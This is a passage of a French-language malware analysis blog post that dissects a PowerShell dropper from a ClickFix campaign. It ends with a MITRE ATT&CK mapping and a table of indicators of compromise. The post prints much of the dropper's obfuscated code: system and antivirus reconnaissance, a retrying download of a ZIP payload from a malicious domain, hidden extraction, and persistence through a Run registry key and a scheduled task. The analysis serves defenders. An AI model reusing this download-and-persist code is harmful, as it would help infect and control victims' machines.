use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text css=\"\"]Ci-dessous les lignes de code responsables de la collecte des informations :<\/p>\n

    \u2014 Collecte de base (variables d'environnement) :<\/strong> Le script commence par r\u00e9cup\u00e9rer des informations simples via les variables d\u2019environnement, comme le nom d\u2019utilisateur et le nom de la machine.[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\" z_index=\"\" background_color=\"#F9F9F9\" side_padding=\"5\" padding_top=\"25\" padding_bottom=\"25\"][vc_column][vc_column_text css=\"\"]$ccnvc_jxjlbn_derwuvwayblqdg5 = $env:USERNAME
    \n$hcgzi_xkbejhfx3hrl9cz55jv1t2y = $env:COMPUTERNAME
    \n$nckk_rvcjmubkd1_kzegd9_pryqmenc = [Environment]<\/span>::OSVersion.VersionString<\/span><\/code>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_empty_space][vc_column_text css=\"\"]\u2014 Informations syst\u00e8me via WMI :<\/strong> Des requ\u00eates WMI sont utilis\u00e9es pour obtenir des d\u00e9tails plus pr\u00e9cis sur le fabricant de PC et le mod\u00e8le.[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\" z_index=\"\" background_color=\"#F9F9F9\" side_padding=\"5\" padding_top=\"25\" padding_bottom=\"25\"][vc_column][vc_column_text css=\"\"]$ilmnd_ltuvggtn_wcj03ql6wqb = Get-WmiObject -Class Win32_ComputerSystem<\/span>
    \n$psqij_wybmtargz_gieamgogg65xc36zed8 = $ilmnd_ltuvggtn_wcj03ql6wqb.Model<\/span>
    \n$eip_nhnwzepml9wcacm7xgv08n4819ur = $ilmnd_ltuvggtn_wcj03ql6wqb.Manufacturer<\/span><\/code><\/p>\n

    $rzakz_mfgapwedtcl4l2z4tpdk = (Get-WmiObject -Class Win32_OperatingSystem<\/span>).Caption<\/code>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_empty_space][vc_column_text css=\"\"]\u2014 Version PowerShell & privil\u00e8ges\u00a0:<\/strong> Le script v\u00e9rifie la version de Powershell et va d\u00e9terminer si le script s\u2019ex\u00e9cute sous un compte disposant des droits d\u2019administrateur.[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\" z_index=\"\" background_color=\"#F9F9F9\" side_padding=\"5\" padding_top=\"25\" padding_bottom=\"25\"][vc_column][vc_column_text css=\"\"]$zwwjog_efxw_xyp8_lahb = $PSVersionTable.PSVersion.ToString<\/span>()<\/code><\/p>\n

    $kty5_evznwrx_wzv67xfu = (
    \n[Security.Principal.WindowsPrincipal<\/span>]
    \n[Security.Principal.WindowsIdentity<\/span>]::GetCurrent<\/span>()
    \n).IsInRole([Security.Principal.WindowsBuiltInRole<\/span>]::Administrator<\/span>)<\/code>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_empty_space][vc_column_text css=\"\"]\u2014 CPU :<\/strong> Des informations sur le processeur sont collect\u00e9es, en particulier le nom complet du CPU.[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\" z_index=\"\" background_color=\"#F9F9F9\" side_padding=\"5\" padding_top=\"25\" padding_bottom=\"25\"][vc_column][vc_column_text css=\"\"]$p = Get-WmiObject -Class Win32_Processor -ErrorAction SilentlyContinue<\/span> | Select-Object -First<\/span> 1<\/span>
    \nif<\/span><\/strong> ($p -and $p.Name) {
    \n$wqbat6_ymbxnzy_myrwplsco_bt = ($p.Name<\/span> -replace '\\s{2,}', ' ').Trim()
    \n}<\/code>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_empty_space][vc_column_text css=\"\"]\u2014 RAM :<\/strong> La quantit\u00e9 de m\u00e9moire vive disponible est r\u00e9cup\u00e9r\u00e9e.[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\" z_index=\"\" background_color=\"#F9F9F9\" side_padding=\"5\" padding_top=\"25\" padding_bottom=\"25\"][vc_column][vc_column_text css=\"\"]$cs = Get-WmiObject -Class Win32_ComputerSystem -ErrorAction SilentlyContinue<\/span>
    \nif<\/span><\/strong> ($cs -and $null<\/span><\/strong> -ne $cs.TotalPhysicalMemory<\/span>) {
    \n$gb = [math]::Round<\/span>($cs.TotalPhysicalMemory<\/span> \/ 1<\/span>GB, 1<\/span>)
    \n$ptuucgsqt8_yzawg7tubg5y0yd1vs = \"$gb GB\"
    \n}<\/code>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_empty_space][vc_column_text css=\"\"]\u2014 Antivirus :<\/strong> Une requ\u00eate permet de d\u00e9tecter les solutions antivirus install\u00e9es sur le syst\u00e8me.[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\" z_index=\"\" background_color=\"#F9F9F9\" side_padding=\"5\" padding_top=\"25\" padding_bottom=\"25\"][vc_column][vc_column_text css=\"\"]$zdqn_noxiudjz10xipuujr9nau = Get-CimInstance -ClassName AntiVirusProduct<\/span> `
    \n-Namespace<\/span> root\/SecurityCenter2 -ErrorAction SilentlyContinue |<\/span>
    \nSelect-Object -ExpandProperty<\/span> displayName<\/code><\/p>\n

    if<\/span><\/strong> ($zdqn_noxiudjz10xipuujr9nau) {
    \n$zdqn_noxiudjz10xipuujr9nau = ($zdqn_noxiudjz10xipuujr9nau -join \" |<\/span> \")
    \n} else<\/span><\/strong> {
    \n$zdqn_noxiudjz10xipuujr9nau = \"None\"<\/span>
    \n}<\/code>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_empty_space][vc_column_text css=\"\"]\u2014 Domaine :<\/strong> Le script tente de d\u00e9terminer si la machine est rattach\u00e9e \u00e0 un domaine Active Directory.[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\" z_index=\"\" background_color=\"#F9F9F9\" side_padding=\"5\" padding_top=\"25\" padding_bottom=\"25\"][vc_column][vc_column_text css=\"\"]if<\/span><\/strong> ($env:USERDOMAIN) {
    \n$ichdxegc_zanevfyp2y = $env:USERDOMAIN
    \n} elseif ($env:LOGONSERVER) {
    \n$ichdxegc_zanevfyp2y = $env:LOGONSERVER -replace '\\\\', ''
    \n}<\/code>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_empty_space][vc_column_text css=\"\"]\u2014 Architecture :<\/strong> L\u2019architecture du syst\u00e8me (32 ou 64 bits) est identifi\u00e9e.[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\" z_index=\"\" background_color=\"#F9F9F9\" side_padding=\"5\" padding_top=\"25\" padding_bottom=\"25\"][vc_column][vc_column_text css=\"\"]if<\/span><\/strong> ([Environment]<\/span>::Is64BitOperatingSystem<\/span>) {
    \n$zmb6_vjwgxzwh6_xfgvtqh94gnmd = \"x64\"<\/span>
    \n} else<\/span><\/strong> {
    \n$zmb6_vjwgxzwh6_xfgvtqh94gnmd = \"x86\"<\/span>
    \n}<\/code>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_empty_space][vc_column_text css=\"\"]\u2014 Fuseau horaire :<\/strong> Le fuseau horaire est r\u00e9cup\u00e9r\u00e9.[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\" z_index=\"\" background_color=\"#F9F9F9\" side_padding=\"5\" padding_top=\"25\" padding_bottom=\"25\"][vc_column][vc_column_text css=\"\"]$tz = Get-TimeZone -ErrorAction SilentlyContinue<\/span>
    \nif<\/strong><\/span> ($tz) {
    \n$rdfboyqe_mik_ikzxrxr5i1gtwow33do = $tz<\/span>.Id<\/span>
    \n}<\/code>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_empty_space][vc_column_text css=\"\"]<\/p>\n

    T\u00e9l\u00e9chargement d'un autre payload<\/h3>\n

    Apr\u00e8s la reconnaissance, le dropper ne perd pas de temps et t\u00e9l\u00e9charge une archive ZIP depuis https:\/\/hailmeinc[.]com\/bkmsiqop[.]zip en utilisant principalement l\u2019API HttpClient. Il contient une gestion avanc\u00e9e des erreurs avec un m\u00e9canisme de compteur de tentatives ($maxAttempts = 4<\/code>). Le fichier est d\u2019abord enregistr\u00e9 sous forme temporaire (.tmp) dans le dossier %TEMP%<\/code>, puis sa taille et sa validit\u00e9 en tant qu\u2019archive ZIP sont v\u00e9rifi\u00e9es avant d\u2019\u00eatre renomm\u00e9 en .zip.<\/p>\n

    En cas d\u2019\u00e9chec des premi\u00e8res tentatives (jusqu\u2019\u00e0 3), le script bascule vers une m\u00e9thode alternative en utilisant Invoke-WebRequest<\/code>. Une fois le t\u00e9l\u00e9chargement valid\u00e9, le script envoie un message de succ\u00e8s au serveur C2 (Command and Control).[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\" z_index=\"\" background_color=\"#7CBDE4\" side_padding=\"10\" padding_top=\"25\" padding_bottom=\"25\"][vc_column][vc_column_text css=\"\"]Info<\/strong><\/span><\/p>\n

    Si le t\u00e9l\u00e9chargement de la charge \u00e9choue ou est invalide, le script supprime les fichiers temporaires, envoie un message download_fail<\/code> au serveur C2, et l\u2019infection s\u2019arr\u00eate.<\/span>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_empty_space][vc_column_text css=\"\"]Le code ci-dessous en illustre le fonctionnement\u00a0:[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\" z_index=\"\" background_color=\"#F9F9F9\" side_padding=\"5\" padding_top=\"25\" padding_bottom=\"25\"][vc_column][vc_column_text css=\"\"]$rmrnmjv_xowrzfw_ergg = 'https:\/\/hailmeinc.com\/bkmsiqop[.]zip'
    \n$kayptkrgh_cebx_ytc_ist45mlz = \"$env:TEMP\\metvtbg3_zpd_ptred.zip\"<\/span>
    \n$ybhjmpx_thul7yx6q361p4hxk = $kayptkrgh_cebx_ytc_ist45mlz + \".tmp\"<\/span><\/code><\/p>\n

    $minValidBytes = 10240<\/span>
    \n$maxAttempts = 4<\/span>
    \n$totalTimeoutSec = 320<\/span><\/code><\/p>\n

    for<\/span><\/strong> ($attempt = 0<\/span>; $attempt -lt $maxAttempts; $attempt++) {<\/code><\/p>\n

    if<\/span><\/strong> ($attempt -le 2<\/span>) {
    \n$handler = New-Object System.<\/span>Net.<\/span>Http.<\/span>HttpClientHandler<\/span>
    \n$handler<\/span>.AutomaticDecompression<\/span> = [System<\/span>.Net<\/span>.DecompressionMethods<\/span>]::GZip<\/span> -bor [System<\/span>.Net<\/span>.DecompressionMethods<\/span>]::Deflate<\/span><\/code><\/p>\n

    $client = New-Object System<\/span>.Net<\/span>.Http<\/span>.HttpClient<\/span>($handler)
    \n$client<\/span>.Timeout<\/span> = [TimeSpan<\/span>]::FromSeconds<\/span>($totalTimeoutSec)<\/code><\/p>\n

    $client<\/span>.DefaultRequestHeaders<\/span>.Add<\/span>(\"User-Agent\"<\/span>, \"Mozilla\/5.0\"<\/span>)
    \n$response = $client<\/span>.GetAsync<\/span>($rmrnmjv_xowrzfw_ergg).Result<\/code><\/p>\n

    $stream = $response<\/span>.Content<\/span>.ReadAsStreamAsync<\/span>().Result
    \n$fs = [System<\/span>.IO<\/span>.File<\/span>]::Create<\/span>($ybhjmpx_thul7yx6q361p4hxk)<\/code><\/p>\n

    $stream<\/span>.CopyTo<\/span>($fs)<\/code><\/p>\n

    $fs<\/span>.Close<\/span>()
    \n$stream<\/span>.Close<\/span>()
    \n$client<\/span>.Dispose<\/span>()
    \n}
    \nelse<\/span><\/strong> {
    \n$progressPreference = 'SilentlyContinue<\/span>'<\/code><\/p>\n

    Invoke-WebRequest -Uri<\/span> $rmrnmjv_xowrzfw_ergg `
    \n-OutFile<\/span> $ybhjmpx_thul7yx6q361p4hxk `
    \n-UserAgent<\/span> \"Mozilla\/5.0 (Windows NT 10.0; Win64; x64)\"<\/span> `
    \n-UseBasicParsing<\/span> `
    \n-TimeoutSec<\/span> $totalTimeoutSec `
    \n-MaximumRedirection<\/span> 5<\/span>
    \n}
    \nif<\/span><\/strong> (Test-Path<\/span> $ybhjmpx_thul7yx6q361p4hxk) {
    \n$fileInfo = Get-Item<\/span> $ybhjmpx_thul7yx6q361p4hxk<\/code><\/p>\n

    if<\/span><\/strong> ($fileInfo<\/span>.Length<\/span> -ge $minValidBytes) {
    \nMove-Item<\/span> $ybhjmpx_thul7yx6q361p4hxk $kayptkrgh_cebx_ytc_ist45mlz -Force<\/span>
    \nbreak<\/span><\/strong>
    \n}
    \n}
    \n}<\/code>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_empty_space][vc_column_text css=\"\"]<\/p>\n

    D\u00e9ploiement<\/h3>\n

    Apr\u00e8s t\u00e9l\u00e9chargement, le dropper tente de d\u00e9ployer la charge dans plusieurs dossiers possibles sur le syst\u00e8me.<\/p>\n

    Il d\u00e9finit d\u2019abord une liste de dossiers candidats, tous situ\u00e9s dans le profil de l\u2019utilisateur. En th\u00e9orie, il ne devrait donc pas y avoir de probl\u00e8me d\u2019\u00e9criture.[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\" z_index=\"\" background_color=\"#F9F9F9\" side_padding=\"5\" padding_top=\"25\" padding_bottom=\"25\"][vc_column][vc_column_text css=\"\"]$folders = @(
    \n\"$env:LOCALAPPDATA\"<\/span>,
    \n\"$env:APPDATA\"<\/span>,
    \n\"$env:TEMP\"<\/span>,
    \n\"$env:USERPROFILE\\AppData\\Local\"<\/span>,
    \n\"$env:USERPROFILE\\Documents\"<\/span>
    \n)<\/code>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_empty_space][vc_column_text css=\"\"]Ensuite, il parcourt chaque dossier pour y extraire l'archive ZIP dans un sous dossier unique puis cacher les fichiers extraits (via les attributs de fichier). En cas de probl\u00e8me, il tente sa chance avec le prochain dossier de la liste.<\/p>\n

    Persistance<\/h3>\n

    Une fois d\u00e9ploy\u00e9, le dropper assure la persistance du payload en programmant le lancement automatique de l\u2019ex\u00e9cutable final au d\u00e9marrage de la session de l'utilisateur. Pour l'identifier, il cherche parmi les fichiers extraits, le premier fichier d'extension .exe<\/code> ou .bat<\/code>.[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\" z_index=\"\" background_color=\"#F9F9F9\" side_padding=\"5\" padding_top=\"25\" padding_bottom=\"25\"][vc_column][vc_column_text css=\"\"]$pxtpgmp_mzlpvpwd_djkfv5euf5ym = Get-ChildItem -LiteralPath<\/span> $hjczxmu5_ylniricgh5t9o1egfo8v5vx -Filter<\/span> \"*.exe\"<\/span> -Recurse -File -ErrorAction SilentlyContinue | Select-Object -First<\/span> 1<\/span>
    \nif<\/span><\/strong> (-not $pxtpgmp_mzlpvpwd_djkfv5euf5ym) {
    \n$pxtpgmp_mzlpvpwd_djkfv5euf5ym = Get-ChildItem -LiteralPath<\/span> $hjczxmu5_ylniricgh5t9o1egfo8v5vx -Filter<\/span> \"*.bat\"<\/span> -Recurse -File -ErrorAction SilentlyContinue | Select-Object -First<\/span> 1<\/span>
    \n}<\/code><\/p>\n

    [...]<\/code><\/p>\n

    $dak_byhtc_rbcqve47lftj33h67wvs5mtq = $pxtpgmp_mzlpvpwd_djkfv5euf5ym.FullName<\/span><\/code><\/p>\n

    [...]<\/code><\/p>\n

    $buodgdzpc_abmemxc_jnqbazymol7m1gv = 'HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run<\/span>'
    \n$ztiby6_lsofozr7hfvcxz19dwufszdig2hn = \"ivni9_sauqw9_csq_jzdfo${var_map['unique_tag']}\"<\/span>
    \n$dhri_qrzloz2_mcf_abwapumflh = '\"' + $dak_byhtc_rbcqve47lftj33h67wvs5mtq + '\"'
    \ntry<\/span><\/strong> {
    \nSet-ItemProperty -Path<\/span> $buodgdzpc_abmemxc_jnqbazymol7m1gv -Name<\/span> $ztiby6_lsofozr7hfvcxz19dwufszdig2hn -Value<\/span> $dhri_qrzloz2_mcf_abwapumflh -ErrorAction Stop<\/span><\/code><\/p>\n

    [...]<\/code>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_empty_space][vc_column_text css=\"\"]Voici un aper\u00e7u de la clef registre cr\u00e9\u00e9e pour le cas sp\u00e9cifique du payload de cette chaine d'attaque\u00a0:[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_single_image image=\"774030\" img_size=\"large\" alignment=\"center\" css=\"\" qode_css_animation=\"\"][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text css=\"\"]Si cette m\u00e9thode \u00e9choue, le dropper tente un fallback<\/strong> avec une t\u00e2che planifi\u00e9e\u00a0:[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\" z_index=\"\" background_color=\"#F9F9F9\" side_padding=\"5\" padding_top=\"25\" padding_bottom=\"25\"][vc_column][vc_column_text css=\"\"]$tqkek_oxp_oxwi_rahjn7lojrz1bwd5 = \"ivni9_sauqw9_csq_jzdfo${var_map['unique_tag']}\"<\/span><\/code><\/p>\n

    [...]<\/code><\/p>\n

    $taskTr = '\"' + $dak_byhtc_rbcqve47lftj33h67wvs5mtq + '\"'
    \n$taskCreated = $false<\/span>
    \ntry<\/span><\/strong> {
    \n$null<\/strong><\/span> = & schtasks \/create \/tn $tqkek_oxp_oxwi_rahjn7lojrz1bwd5 \/tr $taskTr \/sc onlogon \/f \/rl limited
    \nif<\/strong><\/span> ($LASTEXITCODE -eq 0<\/span>) { $taskCreated = $true<\/span>; $utl_iawknluwgoky6rb0nvzt5h0yj6y4s = $true<\/span> }
    \n} catch<\/span><\/strong> { }<\/code>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_empty_space][vc_column_text css=\"\"]Ici, il cr\u00e9e une t\u00e2che planifi\u00e9e nomm\u00e9e ivni9_sauqw9_csq_jzdfo<\/code> qui ex\u00e9cute le payload \u00e0 chaque ouverture de session de l\u2019utilisateur.<\/p>\n

    La persistance repose sur le registre et les t\u00e2ches planifi\u00e9es. Si les deux \u00e9chouent, le dropper n\u2019essaie aucun autre m\u00e9canisme et le payload ne survivra pas aux fermetures de session Windows.<\/p>\n

    Ex\u00e9cution de la charge<\/h3>\n

    Le dropper lance le payload final, soit directement via son ex\u00e9cutable ou son script de d\u00e9marrage. L\u2019ex\u00e9cution se fait en arri\u00e8re-plan et sans interaction avec l\u2019utilisateur.[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\" z_index=\"\" background_color=\"#F9F9F9\" side_padding=\"5\" padding_top=\"25\" padding_bottom=\"25\"][vc_column][vc_column_text css=\"\"]$dhri_qrzloz2_mcf_abwapumflh = '\"' + $dak_byhtc_rbcqve47lftj33h67wvs5mtq + '\"'
    \nStart-Process -FilePath<\/span> $dak_byhtc_rbcqve47lftj33h67wvs5mtq -WindowStyle Hidden<\/span><\/code>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_empty_space][vc_column_text css=\"\"]<\/p>\n

    R\u00e9capitulatif de la phase d'ex\u00e9cution<\/h3>\n

    Ce script PowerShell correspond \u00e0 un dropper classique, structur\u00e9 autour de plusieurs \u00e9tapes bien d\u00e9finies :<\/p>\n

      \n
    • Reconnaissance du syst\u00e8me,<\/li>\n
    • T\u00e9l\u00e9chargement de la charge,<\/li>\n
    • D\u00e9ploiement,<\/li>\n
    • Tentative de persistance,<\/li>\n
    • Ex\u00e9cution du payload.<\/li>\n<\/ul>\n

      L\u2019analyse montre une logique simple mais efficace, avec des m\u00e9canismes de repli (multiples dossiers, m\u00e9thodes de persistance alternatives) permettant d\u2019augmenter les chances de succ\u00e8s. Le script int\u00e8gre \u00e9galement un syst\u00e8me de reporting, offrant \u00e0 l\u2019attaquant une visibilit\u00e9 sur le d\u00e9roulement de chaque \u00e9tape.<\/p>\n

      Dans un prochain article, nous analyserons la charge finale d\u00e9pos\u00e9e et ex\u00e9cut\u00e9e chez la victime.[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_empty_space][vc_column_text css=\"\"]<\/p>\n

      Mapping des techniques observ\u00e9es (MITRE ATT&CK)<\/h2>\n
      \n
      Tactique<\/strong><\/span><\/div><\/div><\/div><\/td>
      Technique<\/strong><\/span><\/div><\/div><\/div><\/td>
      Description<\/strong><\/span><\/div><\/div><\/div><\/td><\/tr>
      Execution<\/span><\/div><\/div><\/div><\/td>
      User Execution: Malicious Copy and Paste<\/span><\/div><\/div><\/div><\/td><\/tr>
      Execution<\/span><\/div><\/div><\/div><\/td>
      Command and Scripting Interpreter: PowerShell <\/span><\/div><\/div><\/div><\/td><\/tr>
      Persistence, Privilege Escalation<\/span><\/div><\/div><\/div><\/td>
      Boot or Logon Autostart Execution: Registry Run Keys \/ Startup Folder<\/span><\/div><\/div><\/div><\/td><\/tr>
      Persistence, Execution<\/span><\/div><\/div><\/div><\/td>
      Scheduled Task\/Job: Scheduled Task<\/span><\/div><\/div><\/div><\/td><\/tr>
      Discovery<\/span><\/div><\/div><\/div><\/td>
      Account Discovery<\/span><\/div><\/div><\/div><\/td><\/tr>
      Discovery<\/span><\/div><\/div><\/div><\/td>
      Software Discovery: Security Software Discovery<\/span><\/div><\/div><\/div><\/td><\/tr>
      Discovery<\/span><\/div><\/div><\/div><\/td>
      System Time Discovery<\/span><\/div><\/div><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n\n

      L'\u00e9quivalent renseign\u00e9 dans la matrice MITRE donne ce visuel\u00a0:[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_single_image image=\"774037\" img_size=\"large\" alignment=\"center\" css=\"\" qode_css_animation=\"\"][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text css=\"\"]<\/p>\n

      IOCs identifi\u00e9s<\/h2>\n
      \n
      Type<\/strong><\/span><\/div><\/div><\/div><\/td>
      Usage<\/strong><\/span><\/div><\/div><\/div><\/td>
      Valeur<\/strong><\/span><\/div><\/div><\/div><\/td>
      Description<\/strong><\/span><\/div><\/div><\/div><\/td><\/tr>
      Domaine<\/span><\/div><\/div><\/div><\/td>
      ClickFix<\/span><\/div><\/div><\/div><\/td>
      accountpulsecentre.help<\/span><\/div><\/div><\/div><\/td>
      Site malveillant exploitant la technique ClickFix et fournissant la commande malveillante initiale.<\/span><\/div><\/div><\/div><\/td><\/tr>
      Domaine<\/span><\/div><\/div><\/div><\/td>
      Payload n\u00b01
      C2 n\u00b01<\/span><\/div><\/div><\/div><\/td>
      wiosyrondaty.com<\/span><\/div><\/div><\/div><\/td>
      Fourniture d'un premier payload en PowerShell.<\/span><\/div><\/div><\/div><\/td><\/tr>
      URL<\/span><\/div><\/div><\/div><\/td>
      ClickFix<\/span><\/div><\/div><\/div><\/td>
      https[:]\/\/accountpulsecentre[.]help\/ern-ZIoCCeHgBJpt2g33q1ZHZmrC2jCoRE1hGJ5O38s?get_command=1<\/span><\/div><\/div><\/div><\/td>
      Fourniture de commande ClickFix.<\/span><\/div><\/div><\/div><\/td><\/tr>
      URL<\/span><\/div><\/div><\/div><\/td>
      ClickFix<\/span><\/div><\/div><\/div><\/td>
      https[:]\/\/accountpulsecentre[.]help\/ern\u2011ZIoCCeHgBJpt2g33q1ZHZmrC2jCoRE1hGJ5O38s<\/span><\/div><\/div><\/div><\/td>
      URL de notification informant qu'un utilisateur a copi\u00e9 la commande malveillante dans son presse-papiers.<\/span><\/div><\/div><\/div><\/td><\/tr>
      URL<\/span><\/div><\/div><\/div><\/td>
      C2 n\u00b01<\/span><\/div><\/div><\/div><\/td>
      https[:]\/\/wiosyrondaty[.]com\/0I7IRN3o4o8GefoYto39mLjnEmdxcEEK73hReyAT6-A<\/span><\/div><\/div><\/div><\/td>
